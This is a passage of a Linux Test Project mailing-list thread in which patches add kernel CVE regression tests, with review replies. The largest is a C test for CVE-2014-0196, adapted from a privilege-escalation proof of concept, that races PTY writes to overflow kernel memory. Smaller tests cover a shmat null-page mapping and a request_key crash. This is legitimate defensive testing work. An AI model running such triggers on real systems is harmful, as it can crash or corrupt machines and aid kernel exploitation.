> +dnl the GNU General Public License for more details.
> +dnl
> +dnl You should have received a copy of the GNU General Public License
> +dnl along with this program. If not, see <http://www.gnu.org/licenses/>.
> +
> +AC_DEFUN([LTP_CHECK_UNAME_DOMAINNAME],[
> +AC_CHECK_MEMBERS([struct utsname.domainname],,,[
> +#define _GNU_SOURCE
> +#include <sys/utsname.h>
Hi!
Applied, thanks.

-- 
Cyril Hrubis
chrubis@suse.cz

[LTP] [PATCH v3 5/9] Add CVE .gitignore, Makefile and runtest files

[Richard Palethorpe]

Signed-off-by: Richard Palethorpe <rpalethorpe@suse.com>
---
 runtest/cve              |  5 +++++
 runtest/syscalls         |  2 ++
 scenario_groups/default  |  1 +
 testcases/cve/.gitignore |  3 +++
 testcases/cve/Makefile   | 25 +++++++++++++++++++++++++
 5 files changed, 36 insertions(+)
 create mode 100644 runtest/cve
 create mode 100644 testcases/cve/.gitignore
 create mode 100644 testcases/cve/Makefile

diff --git a/runtest/cve b/runtest/cve
new file mode 100644
index 000000000..83b53d906
--- /dev/null
+++ b/runtest/cve
@@ -0,0 +1,5 @@
+# Tests which check for vulnerabilities by CVE number
+cve-2012-0957 cve-2012-0957
+cve-2016-4997 cve-2016-4997
+cve-2016-5195 dirtyc0w
+cve-2016-7117 cve-2016-7117
diff --git a/runtest/syscalls b/runtest/syscalls
index 08d299a5b..85755eb12 100644
--- a/runtest/syscalls
+++ b/runtest/syscalls
@@ -1143,6 +1143,7 @@ set_tid_address01 set_tid_address01
 setsid01 setsid01
 
 setsockopt01 setsockopt01
+cve-2016-4997 cve-2016-4997
 
 settimeofday01 settimeofday01
 settimeofday02 settimeofday02
@@ -1356,6 +1357,7 @@ umask01 umask01
 uname01 uname01
 uname02 uname02
 uname03 uname03
+cve-2012-0957 cve-2012-0957
 
 unlink01 symlink01 -T unlink01
 unlink05 unlink05
diff --git a/scenario_groups/default b/scenario_groups/default
index b0d770171..5658a618b 100644
--- a/scenario_groups/default
+++ b/scenario_groups/default
@@ -32,3 +32,4 @@ can
 cpuhotplug
 net.ipv6_lib
 input
+cve
diff --git a/testcases/cve/.gitignore b/testcases/cve/.gitignore
new file mode 100644
index 000000000..9c24b83ec
--- /dev/null
+++ b/testcases/cve/.gitignore
@@ -0,0 +1,3 @@
+cve-2012-0957
+cve-2016-4997
+cve-2016-7117
diff --git a/testcases/cve/Makefile b/testcases/cve/Makefile
new file mode 100644
index 000000000..d642b73b4
--- /dev/null
+++ b/testcases/cve/Makefile
@@ -0,0 +1,25 @@
+# Copyright (c) 2017 Linux Test Project
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 2 of
+# the License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it would be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program. If not, see <http://www.gnu.org/licenses/>.
+
+top_srcdir		?= ../..
+
+include $(top_srcdir)/include/mk/testcases.mk
+
+CFLAGS			+= -D_GNU_SOURCE
+
+cve-2014-0196:	LDFLAGS += -lpthread -lutil -lrt
+cve-2016-7117:	LDFLAGS += -lpthread -lrt
+
+include $(top_srcdir)/include/mk/generic_leaf_target.mk
-- 
2.12.2

[LTP] [PATCH v3 5/9] Add CVE .gitignore, Makefile and runtest files

[Cyril Hrubis]

Hi!
Pushed, thanks.

(The first batch of cve tests has been pushed into the git repo now, and
I will continue with the review.)

-- 
Cyril Hrubis
chrubis@suse.cz

[LTP] [PATCH v3 6/9] Test for CVE-2014-0196 PTY echo race

[Richard Palethorpe]

Signed-off-by: Richard Palethorpe <rpalethorpe@suse.com>
---
 runtest/cve                   |   1 +
 testcases/cve/.gitignore      |   1 +
 testcases/cve/cve-2014-0196.c | 161 ++++++++++++++++++++++++++++++++++++++++++
 3 files changed, 163 insertions(+)
 create mode 100644 testcases/cve/cve-2014-0196.c

diff --git a/runtest/cve b/runtest/cve
index 83b53d906..6556ffb0f 100644
--- a/runtest/cve
+++ b/runtest/cve
@@ -1,5 +1,6 @@
 # Tests which check for vulnerabilities by CVE number
 cve-2012-0957 cve-2012-0957
+cve-2014-0196 cve-2014-0196
 cve-2016-4997 cve-2016-4997
 cve-2016-5195 dirtyc0w
 cve-2016-7117 cve-2016-7117
diff --git a/testcases/cve/.gitignore b/testcases/cve/.gitignore
index 9c24b83ec..ff5844263 100644
--- a/testcases/cve/.gitignore
+++ b/testcases/cve/.gitignore
@@ -1,3 +1,4 @@
 cve-2012-0957
+cve-2014-0196
 cve-2016-4997
 cve-2016-7117
diff --git a/testcases/cve/cve-2014-0196.c b/testcases/cve/cve-2014-0196.c
new file mode 100644
index 000000000..4e2b3f582
--- /dev/null
+++ b/testcases/cve/cve-2014-0196.c
@@ -0,0 +1,161 @@
+/*
+ * Copyright (c) 2017 Richard Palethorpe <rpalethorpe@suse.com>
+ * Original POC by Matthew Daley <mattd@bugfuzz.com>
+ *
+ * This program is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 2 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program. If not, see <http://www.gnu.org/licenses/>.
+ */
+/*
+ * This test attempts to cause a buffer overflow using the race condition
+ * described in CVE-2014-0196. If the test is successful in causing an
+ * overflow it will most likely result in an immediate Oops, restart or
+ * freeze. However if it overwrites memory not accessed during the test then
+ * it could happen at a later time or not at all which is more likely if SLAB
+ * randomization has been implemented. However as it currently stands, the test
+ * usually crashes as soon as the delay has been calibrated.
+ *
+ * To maximise the chances of the buffer overflow doing immediate detectable
+ * damage the SLAB filler sockets and ioctls from the original exploit POC
+ * have been kept even though they are not strictly necessary to reproduce the
+ * bug.
+ *
+ * Further details:
+ * see linux commit 4291086b1f081b869c6d79e5b7441633dc3ace00
+ * privilege escalation POC https://www.exploit-db.com/exploits/33516/
+ */
+
+#include <pty.h>
+#include <stdio.h>
+#include <string.h>
+#include <termios.h>
+#include <limits.h>
+
+#include "tst_test.h"
+#include "tst_timer.h"
+#include "tst_safe_pthread.h"
+
+#include "tst_fuzzy_sync.h"
+
+#define ONEOFF_ALLOCS 200
+#define RUN_ALLOCS    30
+#define ATTEMPTS      0x7000
+#define BUFLEN        512
+
+static int master_fd, slave_fd;
+static int filler_ptys[ONEOFF_ALLOCS * 2];
+static int target_ptys[RUN_ALLOCS * 2];
+static char buf[BUFLEN];
+
+static struct tst_fzsync_pair fzsync_pair = TST_FZSYNC_PAIR_INIT;
+
+static void create_pty(int *amaster, int *aslave)
+{
+	if (openpty(amaster, aslave, NULL, NULL, NULL) == -1)
+		tst_brk(TBROK | TERRNO, "pty creation failed");
+}
+
+static void setup(void)
+{
+	int i;
+
+	fzsync_pair.delay_inc = 100;
+	for (i = 0; i < ONEOFF_ALLOCS; i++) {
+		create_pty(&filler_ptys[i],
+			   &filler_ptys[i + ONEOFF_ALLOCS]);
+	}
+}
+
+static void *overwrite_thread_fn(void *p)
+{
+	tst_fzsync_delay_b(&fzsync_pair);
+	tst_fzsync_time_b(&fzsync_pair);
+
+	SAFE_WRITE(0, slave_fd, buf, BUFLEN - 1);
+	SAFE_WRITE(0, slave_fd, buf, BUFLEN - 1);
+	SAFE_WRITE(0, slave_fd, buf, BUFLEN);
+
+	return p;
+}
+
+static void run(void)
+{
+	struct termios t;
+	pthread_t overwrite_thread;
+	int i, j;
+
+	tst_res(TINFO, "Attempting to overflow into a tty_struct...");
+
+	for (i = 0; i < ATTEMPTS; i++) {
+		create_pty(&master_fd, &slave_fd);
+
+		for (j = 0; j < RUN_ALLOCS; j++)
+			create_pty(&target_ptys[j],
+				   &target_ptys[j + RUN_ALLOCS]);
+		SAFE_CLOSE(target_ptys[RUN_ALLOCS / 2]);
+		SAFE_CLOSE(target_ptys[RUN_ALLOCS / 2 + RUN_ALLOCS]);
+
+		SAFE_WRITE(0, slave_fd, buf, 1);
+
+		tcgetattr(master_fd, &t);
+		t.c_oflag &= ~OPOST;
+		t.c_lflag |= ECHO;
+		tcsetattr(master_fd, TCSANOW, &t);
+
+		SAFE_PTHREAD_CREATE(&overwrite_thread, NULL,
+				    overwrite_thread_fn, NULL);
+
+		tst_fzsync_delay_a(&fzsync_pair);
+		tst_fzsync_time_a(&fzsync_pair);
+		SAFE_WRITE(0, master_fd, "A", 1);
+
+		SAFE_PTHREAD_JOIN(overwrite_thread, NULL);
+
+		tst_fzsync_pair_update(i, &fzsync_pair);
+
+		if (!(i & 0x1FFF))
+			tst_fzsync_pair_info(&fzsync_pair);
+
+		for (j = 0; j < RUN_ALLOCS; j++) {
+			if (j == RUN_ALLOCS / 2)
+				continue;
+
+			ioctl(target_ptys[j], 0xdeadbeef);
+			ioctl(target_ptys[j + RUN_ALLOCS], 0xdeadbeef);
+			SAFE_CLOSE(target_ptys[j]);
+			SAFE_CLOSE(target_ptys[j + RUN_ALLOCS]);
+		}
+
+		ioctl(master_fd, 0xdeadbeef);
+		ioctl(slave_fd, 0xdeadbeef);
+		SAFE_CLOSE(master_fd);
+		SAFE_CLOSE(slave_fd);
+	}
+
+	tst_res(TPASS, "Nothing bad happened, probably.");
+}
+
+static void cleanup(void)
+{
+	int i;
+
+	for (i = 0; i < ONEOFF_ALLOCS * 2; i++)
+		close(filler_ptys[i]);
+	close(master_fd);
+	close(slave_fd);
+}
+
+static struct tst_test test = {
+	.setup = setup,
+	.cleanup = cleanup,
+	.test_all = run,
+};
-- 
2.12.2

[LTP] [PATCH v3 6/9] Test for CVE-2014-0196 PTY echo race

[Cyril Hrubis]

Hi!
I've added CFLAGS and LDLIBS to the Makefile (since I removed these
while I was fixing the build) and pushed, thanks.

-- 
Cyril Hrubis
chrubis@suse.cz

[LTP] [PATCH v3 7/9] Test for CVE-2017-5669 in shmat

[Richard Palethorpe]

Xiao Yang and myself independently wrote the same test. Xiao's version can be
seen here: http://lists.linux.it/pipermail/ltp/2017-June/004695.html

Signed-off-by: Richard Palethorpe <rpalethorpe@suse.com>
Signed-off-by: Xiao Yang <yangx.jy@cn.fujitsu.com>
---
 runtest/cve                   |  1 +
 runtest/syscalls              |  1 +
 testcases/cve/.gitignore      |  1 +
 testcases/cve/cve-2017-5669.c | 88 +++++++++++++++++++++++++++++++++++++++++++
 4 files changed, 91 insertions(+)
 create mode 100644 testcases/cve/cve-2017-5669.c

diff --git a/runtest/cve b/runtest/cve
index 6556ffb0f..166c98c8a 100644
--- a/runtest/cve
+++ b/runtest/cve
@@ -4,3 +4,4 @@ cve-2014-0196 cve-2014-0196
 cve-2016-4997 cve-2016-4997
 cve-2016-5195 dirtyc0w
 cve-2016-7117 cve-2016-7117
+cve-2017-5669 cve-2017-5669
diff --git a/runtest/syscalls b/runtest/syscalls
index 85755eb12..12ef696f1 100644
--- a/runtest/syscalls
+++ b/runtest/syscalls
@@ -1164,6 +1164,7 @@ setxattr03 setxattr03
 shmat01 shmat01
 shmat02 shmat02
 shmat03 shmat03
+cve-2017-5669 cve-2017-5669
 
 shmctl01 shmctl01
 shmctl02 shmctl02
diff --git a/testcases/cve/.gitignore b/testcases/cve/.gitignore
index ff5844263..715cbab38 100644
--- a/testcases/cve/.gitignore
+++ b/testcases/cve/.gitignore
@@ -2,3 +2,4 @@ cve-2012-0957
 cve-2014-0196
 cve-2016-4997
 cve-2016-7117
+cve-2017-5669
diff --git a/testcases/cve/cve-2017-5669.c b/testcases/cve/cve-2017-5669.c
new file mode 100644
index 000000000..62e12e236
--- /dev/null
+++ b/testcases/cve/cve-2017-5669.c
@@ -0,0 +1,88 @@
+/*
+ * Copyright (c) 2017 Richard Palethorpe <rpalethorpe@suse.com>
+ * Copyright (c) 2017 Fujitsu Ltd. (Xiao Yang <yangx.jy@cn.fujitsu.com>)
+ *
+ * This program is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 2 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program. If not, see <http://www.gnu.org/licenses/>.
+ */
+/*
+ * Test for CVE-2017-5669 which allows us to map the nil page using shmat.
+ *
+ * When the bug is present shmat(..., (void *)1, SHM_RND) will round address
+ * 0x1 down to zero and give us the (nil/null) page. With the current bug fix
+ * in place, shmat it will return EINVAL instead. We also check to see if the
+ * returned address is outside the nil page in case an alternative fix has
+ * been applied.
+ *
+ * In any case we manage to map some memory we also try to write to it. This
+ * is just to see if we get an access error or some other unexpected behaviour.
+ *
+ * See commit 95e91b831f (ipc/shm: Fix shmat mmap nil-page protection)
+ */
+#include <sys/types.h>
+#include <sys/ipc.h>
+#include <sys/shm.h>
+
+#include <stdio.h>
+#include <errno.h>
+#include <string.h>
+
+#include "tst_test.h"
+#include "tst_safe_sysv_ipc.h"
+
+static int shm_id;
+static void *shm_addr;
+
+static void cleanup(void)
+{
+	if (shm_addr)
+		SAFE_SHMDT(shm_addr);
+	shm_addr = 0;
+
+	if (shm_id)
+		SAFE_SHMCTL(shm_id, IPC_RMID, 0);
+	shm_id = 0;
+}
+
+static void run(void)
+{
+	shm_id = SAFE_SHMGET(IPC_PRIVATE, getpagesize(), 0777);
+
+	tst_res(TINFO, "Attempting to attach shared memory to null page");
+	shm_addr = shmat(shm_id, ((void *)1), SHM_RND);
+	if (shm_addr == (void *)-1) {
+		if (errno == EINVAL) {
+			tst_res(TPASS, "shmat returned EINVAL");
+			shm_addr = 0;
+			return;
+		}
+		tst_brk(TBROK | TERRNO,
+			"The bug was not triggered, but the shmat error is unexpected");
+	}
+
+	tst_res(TINFO, "Mapped shared memory to %p", shm_addr);
+
+	if (!((size_t)shm_addr & (~0U << 16)))
+		tst_res(TFAIL,
+			"We have mapped a VM address within the first 64Kb");
+	else
+		tst_res(TPASS,
+			"The kernel assigned a different VM address");
+
+	((char *)shm_addr)[0] = 'P';
+}
+
+static struct tst_test test = {
+	.cleanup = cleanup,
+	.test_all = run,
+};
-- 
2.12.2

[LTP] [PATCH v3 7/9] Test for CVE-2017-5669 in shmat

[Cyril Hrubis]

Hi!
> +static void cleanup(void)
> +{
> +	if (shm_addr)
> +		SAFE_SHMDT(shm_addr);
> +	shm_addr = 0;
> +
> +	if (shm_id)
> +		SAFE_SHMCTL(shm_id, IPC_RMID, 0);
> +	shm_id = 0;
> +}
> +
> +static void run(void)
> +{
> +	shm_id = SAFE_SHMGET(IPC_PRIVATE, getpagesize(), 0777);

Shouldn't be this done once in the test setup()?

> +	tst_res(TINFO, "Attempting to attach shared memory to null page");
> +	shm_addr = shmat(shm_id, ((void *)1), SHM_RND);
> +	if (shm_addr == (void *)-1) {
> +		if (errno == EINVAL) {
> +			tst_res(TPASS, "shmat returned EINVAL");
> +			shm_addr = 0;
> +			return;
> +		}
> +		tst_brk(TBROK | TERRNO,
> +			"The bug was not triggered, but the shmat error is unexpected");
> +	}
> +
> +	tst_res(TINFO, "Mapped shared memory to %p", shm_addr);
> +
> +	if (!((size_t)shm_addr & (~0U << 16)))
> +		tst_res(TFAIL,
> +			"We have mapped a VM address within the first 64Kb");
> +	else
> +		tst_res(TPASS,
> +			"The kernel assigned a different VM address");
> +
> +	((char *)shm_addr)[0] = 'P';

Why do we try to write to the addres at all?

We do PASS/FAIL decision based only on the addres returned from shmat().

Also we should detach the memory here in case that the test was called
with -i parameter.

> +}
> +
> +static struct tst_test test = {
> +	.cleanup = cleanup,
> +	.test_all = run,
> +};
> -- 
> 2.12.2
> 
> 
> -- 
> Mailing list info: https://lists.linux.it/listinfo/ltp

-- 
Cyril Hrubis
chrubis@suse.cz

[LTP] [PATCH v3 7/9] Test for CVE-2017-5669 in shmat

[Richard Palethorpe]

Hello Cyril,

Cyril Hrubis writes:

> Hi!
>> +static void cleanup(void)
>> +{
>> +	if (shm_addr)
>> +		SAFE_SHMDT(shm_addr);
>> +	shm_addr = 0;
>> +
>> +	if (shm_id)
>> +		SAFE_SHMCTL(shm_id, IPC_RMID, 0);
>> +	shm_id = 0;
>> +}
>> +
>> +static void run(void)
>> +{
>> +	shm_id = SAFE_SHMGET(IPC_PRIVATE, getpagesize(), 0777);
>
> Shouldn't be this done once in the test setup()?

Yes.

>
>> +	tst_res(TINFO, "Attempting to attach shared memory to null page");
>> +	shm_addr = shmat(shm_id, ((void *)1), SHM_RND);
>> +	if (shm_addr == (void *)-1) {
>> +		if (errno == EINVAL) {
>> +			tst_res(TPASS, "shmat returned EINVAL");
>> +			shm_addr = 0;
>> +			return;
>> +		}
>> +		tst_brk(TBROK | TERRNO,
>> +			"The bug was not triggered, but the shmat error is unexpected");
>> +	}
>> +
>> +	tst_res(TINFO, "Mapped shared memory to %p", shm_addr);
>> +
>> +	if (!((size_t)shm_addr & (~0U << 16)))
>> +		tst_res(TFAIL,
>> +			"We have mapped a VM address within the first 64Kb");
>> +	else
>> +		tst_res(TPASS,
>> +			"The kernel assigned a different VM address");
>> +
>> +	((char *)shm_addr)[0] = 'P';
>
> Why do we try to write to the addres at all?
>
> We do PASS/FAIL decision based only on the addres returned from
> shmat().

To see if anything interesting happens, like a segfault. I don't think
anything is likely to happen, but it seemed worth leaving in at the
time.

>
> Also we should detach the memory here in case that the test was called
> with -i parameter.

OK.

-- 
Thank you,
Richard.

[LTP] [PATCH v3 7/9] Test for CVE-2017-5669 in shmat

[Cyril Hrubis]

Hi!
> > Why do we try to write to the addres at all?
> >
> > We do PASS/FAIL decision based only on the addres returned from
> > shmat().
> 
> To see if anything interesting happens, like a segfault. I don't think
> anything is likely to happen, but it seemed worth leaving in at the
> time.

Maybe we should also add a TINFO message then, that we are about
dereference the address then.

-- 
Cyril Hrubis
chrubis@suse.cz

[LTP] [PATCH v4] Test for CVE-2017-5669 in shmat

[Richard Palethorpe]

Xiao Yang and myself independently wrote the same test. Xiao's version can be
seen here: http://lists.linux.it/pipermail/ltp/2017-June/004695.html

Signed-off-by: Richard Palethorpe <rpalethorpe@suse.com>
Signed-off-by: Xiao Yang <yangx.jy@cn.fujitsu.com>
---

* V4 - Add info message about touching the memory and make sure memory is
  cleaned up.

 runtest/cve                   |  1 +
 runtest/syscalls              |  1 +
 testcases/cve/.gitignore      |  1 +
 testcases/cve/cve-2017-5669.c | 97 +++++++++++++++++++++++++++++++++++++++++++
 4 files changed, 100 insertions(+)
 create mode 100644 testcases/cve/cve-2017-5669.c

diff --git a/runtest/cve b/runtest/cve
index 6556ffb0f..166c98c8a 100644
--- a/runtest/cve
+++ b/runtest/cve
@@ -4,3 +4,4 @@ cve-2014-0196 cve-2014-0196
 cve-2016-4997 cve-2016-4997
 cve-2016-5195 dirtyc0w
 cve-2016-7117 cve-2016-7117
+cve-2017-5669 cve-2017-5669
diff --git a/runtest/syscalls b/runtest/syscalls
index bd4f1e8e7..25fa74c10 100644
--- a/runtest/syscalls
+++ b/runtest/syscalls
@@ -1160,6 +1160,7 @@ setxattr03 setxattr03
 
 shmat01 shmat01
 shmat02 shmat02
+cve-2017-5669 cve-2017-5669
 
 shmctl01 shmctl01
 shmctl02 shmctl02
diff --git a/testcases/cve/.gitignore b/testcases/cve/.gitignore
index ff5844263..715cbab38 100644
--- a/testcases/cve/.gitignore
+++ b/testcases/cve/.gitignore
@@ -2,3 +2,4 @@ cve-2012-0957
 cve-2014-0196
 cve-2016-4997
 cve-2016-7117
+cve-2017-5669
diff --git a/testcases/cve/cve-2017-5669.c b/testcases/cve/cve-2017-5669.c
new file mode 100644
index 000000000..b01af8588
--- /dev/null
+++ b/testcases/cve/cve-2017-5669.c
@@ -0,0 +1,97 @@
+/*
+ * Copyright (c) 2017 Richard Palethorpe <rpalethorpe@suse.com>
+ * Copyright (c) 2017 Fujitsu Ltd. (Xiao Yang <yangx.jy@cn.fujitsu.com>)
+ *
+ * This program is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 2 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program. If not, see <http://www.gnu.org/licenses/>.
+ */
+/*
+ * Test for CVE-2017-5669 which allows us to map the nil page using shmat.
+ *
+ * When the bug is present shmat(..., (void *)1, SHM_RND) will round address
+ * 0x1 down to zero and give us the (nil/null) page. With the current bug fix
+ * in place, shmat it will return EINVAL instead. We also check to see if the
+ * returned address is outside the nil page in case an alternative fix has
+ * been applied.
+ *
+ * In any case we manage to map some memory we also try to write to it. This
+ * is just to see if we get an access error or some other unexpected behaviour.
+ *
+ * See commit 95e91b831f (ipc/shm: Fix shmat mmap nil-page protection)
+ */
+#include <sys/types.h>
+#include <sys/ipc.h>
+#include <sys/shm.h>
+
+#include <stdio.h>
+#include <errno.h>
+#include <string.h>
+
+#include "tst_test.h"
+#include "tst_safe_sysv_ipc.h"
+
+static int shm_id;
+static void *shm_addr;
+
+static void setup(void)
+{
+	shm_id = SAFE_SHMGET(IPC_PRIVATE, getpagesize(), 0777);
+}
+
+static void cleanup(void)
+{
+	if (shm_addr)
+		SAFE_SHMDT(shm_addr);
+	shm_addr = 0;
+
+	if (shm_id)
+		SAFE_SHMCTL(shm_id, IPC_RMID, 0);
+	shm_id = 0;
+}
+
+static void run(void)
+{
+	tst_res(TINFO, "Attempting to attach shared memory to null page");
+	shm_addr = shmat(shm_id, ((void *)1), SHM_RND);
+	if (shm_addr == (void *)-1) {
+		shm_addr = 0;
+		if (errno == EINVAL) {
+			tst_res(TPASS, "shmat returned EINVAL");
+			return;
+		}
+		tst_brk(TBROK | TERRNO,
+			"The bug was not triggered, but the shmat error is unexpected");
+	}
+
+	tst_res(TINFO, "Mapped shared memory to %p", shm_addr);
+
+	if (!((size_t)shm_addr & (~0U << 16)))
+		tst_res(TFAIL,
+			"We have mapped a VM address within the first 64Kb");
+	else
+		tst_res(TPASS,
+			"The kernel assigned a different VM address");
+
+	tst_res(TINFO,
+		"Touching shared memory to see if anything strange happens");
+	((char *)shm_addr)[0] = 'P';
+
+	SAFE_SHMDT(shm_addr);
+	shm_addr = 0;
+}
+
+static struct tst_test test = {
+	.setup = setup,
+	.cleanup = cleanup,
+	.test_all = run,
+};
-- 
2.13.2

[LTP] [PATCH v4] Test for CVE-2017-5669 in shmat

[Cyril Hrubis]

Hi!
> +static int shm_id;
> +static void *shm_addr;
> +
> +static void setup(void)
> +{
> +	shm_id = SAFE_SHMGET(IPC_PRIVATE, getpagesize(), 0777);
> +}
> +
> +static void cleanup(void)
> +{
> +	if (shm_addr)
> +		SAFE_SHMDT(shm_addr);
> +	shm_addr = 0;
> +
> +	if (shm_id)
> +		SAFE_SHMCTL(shm_id, IPC_RMID, 0);
> +	shm_id = 0;
> +}

I've removed the assignments from here, since these were useless.

> +static void run(void)
> +{
> +	tst_res(TINFO, "Attempting to attach shared memory to null page");
> +	shm_addr = shmat(shm_id, ((void *)1), SHM_RND);
> +	if (shm_addr == (void *)-1) {
> +		shm_addr = 0;
> +		if (errno == EINVAL) {
> +			tst_res(TPASS, "shmat returned EINVAL");
> +			return;
> +		}
> +		tst_brk(TBROK | TERRNO,
> +			"The bug was not triggered, but the shmat error is unexpected");
> +	}
> +
> +	tst_res(TINFO, "Mapped shared memory to %p", shm_addr);
> +
> +	if (!((size_t)shm_addr & (~0U << 16)))
> +		tst_res(TFAIL,
> +			"We have mapped a VM address within the first 64Kb");
> +	else
> +		tst_res(TPASS,
> +			"The kernel assigned a different VM address");
> +
> +	tst_res(TINFO,
> +		"Touching shared memory to see if anything strange happens");
> +	((char *)shm_addr)[0] = 'P';
> +
> +	SAFE_SHMDT(shm_addr);
> +	shm_addr = 0;
> +}

And used NULL for shm_addr ones and pushed, thanks.

-- 
Cyril Hrubis
chrubis@suse.cz

[LTP] [PATCH v3 8/9] Test for CVE-2017-6951 in request_key

[Richard Palethorpe]

Signed-off-by: Richard Palethorpe <rpalethorpe@suse.com>
---
 runtest/cve                   |  1 +
 runtest/syscalls              |  1 +
 testcases/cve/.gitignore      |  1 +
 testcases/cve/cve-2017-6951.c | 46 +++++++++++++++++++++++++++++++++++++++++++
 4 files changed, 49 insertions(+)
 create mode 100644 testcases/cve/cve-2017-6951.c

diff --git a/runtest/cve b/runtest/cve
index 166c98c8a..ee0614a9c 100644
--- a/runtest/cve
+++ b/runtest/cve
@@ -5,3 +5,4 @@ cve-2016-4997 cve-2016-4997
 cve-2016-5195 dirtyc0w
 cve-2016-7117 cve-2016-7117
 cve-2017-5669 cve-2017-5669
+cve-2017-6951 cve-2017-6951
diff --git a/runtest/syscalls b/runtest/syscalls
index 12ef696f1..d72bc965b 100644
--- a/runtest/syscalls
+++ b/runtest/syscalls
@@ -919,6 +919,7 @@ renameat202 renameat202 -i 10
 
 request_key01 request_key01
 request_key02 request_key02
+cve-2017-6951 cve-2017-6951
 
 rmdir01 rmdir01
 rmdir02 rmdir02
diff --git a/testcases/cve/.gitignore b/testcases/cve/.gitignore
index 715cbab38..979d18369 100644
--- a/testcases/cve/.gitignore
+++ b/testcases/cve/.gitignore
@@ -3,3 +3,4 @@ cve-2014-0196
 cve-2016-4997
 cve-2016-7117
 cve-2017-5669
+cve-2017-6951
diff --git a/testcases/cve/cve-2017-6951.c b/testcases/cve/cve-2017-6951.c
new file mode 100644
index 000000000..12cfe3e87
--- /dev/null
+++ b/testcases/cve/cve-2017-6951.c
@@ -0,0 +1,46 @@
+/*
+ * Copyright (c) 2017 Richard Palethorpe <rpalethorpe@suse.com>
+ *
+ * This program is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 2 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program. If not, see <http://www.gnu.org/licenses/>.
+ */
+/*
+ * Test for CVE-2016-6951, original reproducer can be found here:
+ * http://www.spinics.net/lists/keyrings/msg01845.html
+ *
+ * request_key() is not in glibc, so we just use the syscall directly instead
+ * of linking to keyutils.
+ */
+
+#include <unistd.h>
+#include <sys/syscall.h>
+
+#include "tst_test.h"
+#include "linux_syscall_numbers.h"
+
+#define ATTEMPTS 0x100
+
+static void run(void)
+{
+	int i;
+
+	tst_res(TINFO, "Requesting dead key");
+	for (i = 0; i < ATTEMPTS; i++)
+		tst_syscall(__NR_request_key, "dead", "abc", "abc", 0, 0, 0);
+
+	tst_res(TPASS, "No crash after %d attempts", ATTEMPTS);
+}
+
+static struct tst_test test = {
+	.test_all = run,
+};
-- 
2.12.2

[LTP] [PATCH v3 8/9] Test for CVE-2017-6951 in request_key

[Cyril Hrubis]

Hi!
Pushed, thanks.

-- 
Cyril Hrubis
chrubis@suse.cz

[LTP] [PATCH v3 9/9] Test for CVE-2017-2671 on ping sockets

[Richard Palethorpe]

Signed-off-by: Richard Palethorpe <rpalethorpe@suse.com>
---
 runtest/cve                   |   1 +
 testcases/cve/.gitignore      |   1 +
 testcases/cve/Makefile        |   1 +
 testcases/cve/cve-2017-2671.c | 120 ++++++++++++++++++++++++++++++++++++++++++
 4 files changed, 123 insertions(+)
 create mode 100644 testcases/cve/cve-2017-2671.c

diff --git a/runtest/cve b/runtest/cve
index ee0614a9c..32a39cf80 100644
--- a/runtest/cve
+++ b/runtest/cve
@@ -4,5 +4,6 @@ cve-2014-0196 cve-2014-0196
 cve-2016-4997 cve-2016-4997
 cve-2016-5195 dirtyc0w
 cve-2016-7117 cve-2016-7117
+cve-2017-2671 cve-2017-2671
 cve-2017-5669 cve-2017-5669
 cve-2017-6951 cve-2017-6951
diff --git a/testcases/cve/.gitignore b/testcases/cve/.gitignore
index 979d18369..b83372b08 100644
--- a/testcases/cve/.gitignore
+++ b/testcases/cve/.gitignore
@@ -2,5 +2,6 @@ cve-2012-0957
 cve-2014-0196
 cve-2016-4997
 cve-2016-7117
+cve-2017-2671
 cve-2017-5669
 cve-2017-6951
diff --git a/testcases/cve/Makefile b/testcases/cve/Makefile
index d642b73b4..e9d9044d5 100644
--- a/testcases/cve/Makefile
+++ b/testcases/cve/Makefile
@@ -21,5 +21,6 @@ CFLAGS			+= -D_GNU_SOURCE
 
 cve-2014-0196:	LDFLAGS += -lpthread -lutil -lrt
 cve-2016-7117:	LDFLAGS += -lpthread -lrt
+cve-2017-2671:	LDFLAGS += -lpthread -lrt
 
 include $(top_srcdir)/include/mk/generic_leaf_target.mk
diff --git a/testcases/cve/cve-2017-2671.c b/testcases/cve/cve-2017-2671.c
new file mode 100644
index 000000000..4e3a446b5
--- /dev/null
+++ b/testcases/cve/cve-2017-2671.c
@@ -0,0 +1,120 @@
+/*
+ * Copyright (c) 2017 Richard Palethorpe <rpalethorpe@suse.com>
+ * Original POC by Daniel Jiang
+ *
+ * This program is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 2 of the License, or
+ * (at your option) any later version.
+ *
